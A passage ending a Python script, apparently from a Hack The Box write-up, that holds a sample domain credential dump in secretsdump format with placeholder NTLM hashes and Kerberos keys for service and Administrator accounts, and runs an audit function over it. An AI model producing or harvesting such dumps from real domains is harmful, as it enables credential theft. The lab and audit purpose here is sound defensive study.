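htb.local\\DefaultAccount:503:{EMPTY_LM}:{EMPTY_NT}:::
htb.local\\netscaler-svc:1104:{EMPTY_LM}:0000000000000000000000000000000a:::
htb.local\\backup-svc:1105:{EMPTY_LM}:0000000000000000000000000000000a:::
htb.local\\mturner:1106:{EMPTY_LM}:0000000000000000000000000000000b:::
DC$:1000:{EMPTY_LM}:0000000000000000000000000000000a:::
[*] Kerberos keys grabbed
htb.local\\Administrator:aes256-cts-hmac-sha1-96:placeholder
"""

if __name__ == "__main__":
    for f in audit(SAMPLE_DUMP):
        print(f["severity"], f["accounts"], "empty" if f["empty_password"] else "", f["privileged"])
```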

Author – Puckiestyle
